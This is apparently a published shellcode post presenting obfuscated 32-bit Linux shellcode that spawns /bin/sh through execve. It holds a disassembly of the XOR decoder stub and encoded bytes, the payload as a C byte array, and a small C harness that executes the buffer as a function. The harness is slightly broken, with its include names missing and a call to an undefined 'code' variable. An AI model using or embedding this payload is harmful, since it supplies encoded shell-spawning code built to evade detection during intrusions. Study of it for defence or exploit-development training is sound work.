Obfuscated Execve /bin/sh Shellcode Greetz : Bomberman&T-Rex Author : B3mB4m Tested On : Ubuntu 14.04 /* Working on SLAE & SPSE <3 */ Disassembly of section .text: 08048060 <.text>: 8048060: eb 10 jmp 0x8048072 8048062: 5e pop %esi 8048063: 31 c9 xor %ecx,%ecx 8048065: b1 2c mov $0x2c,%cl 8048067: 80 36 aa xorb $0xaa,(%esi) 804806a: 80 36 fa xorb $0xfa,(%esi) 804806d: 46 inc %esi 804806e: e2 f7 loop 0x8048067 8048070: eb 05 jmp 0x8048077 8048072: e8 eb ff ff ff call 0x8048062 8048077: bb 40 0e 61 99 mov $0x99610e40,%ebx 804807c: e1 45 loope 0x80480c3 804807e: d0 66 fa shlb -0x6(%esi) 8048081: d0 66 af shlb -0x51(%esi) 8048084: 16 push %ss 8048085: b2 a7 mov $0xa7,%dl 8048087: bb 55 b8 bb af mov $0xafbbb855,%ebx 804808c: af scas %es:(%edi),%eax 804808d: af scas %es:(%edi),%eax 804808e: 34 c5 xor $0xc5,%al 8048090: 55 push %ebp 8048091: 6d insl (%dx),%es:(%edi) 8048092: 2a 2a sub (%edx),%ch 8048094: 76 6d jbe 0x8048103 8048096: 6d insl (%dx),%es:(%edi) 8048097: 2a 67 6c sub 0x6c(%edi),%ah 804809a: 6b 8c e6 8c c7 b5 0e imul $0xffffffc8,0xeb5c78c(%esi,%eiz,8),%ecx 80480a1: c8 80480a2: 85 .byte 0x85 #include #include unsigned char obfucusted[] = \ "\xeb\x10\x5e\x31\xc9\xb1\x2c\x80\x36\xaa\x80\x36\xfa\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xbb\x40\x0e\x61\x99\xe1\x45\xd0\x66\xfa\xd0\x66\xaf\x16\xb2\xa7\xbb\x55\xb8\xbb\xaf\xaf\xaf\x34\xc5\x55\x6d\x2a\x2a\x76\x6d\x6d\x2a\x67\x6c\x6b\x8c\xe6\x8c\xc7\xb5\x0e\xc8\x85"; main(){ printf("Shellcode Length: %d\n", strlen(obfucusted)); int (*ret)() = (int(*)())code; ret();}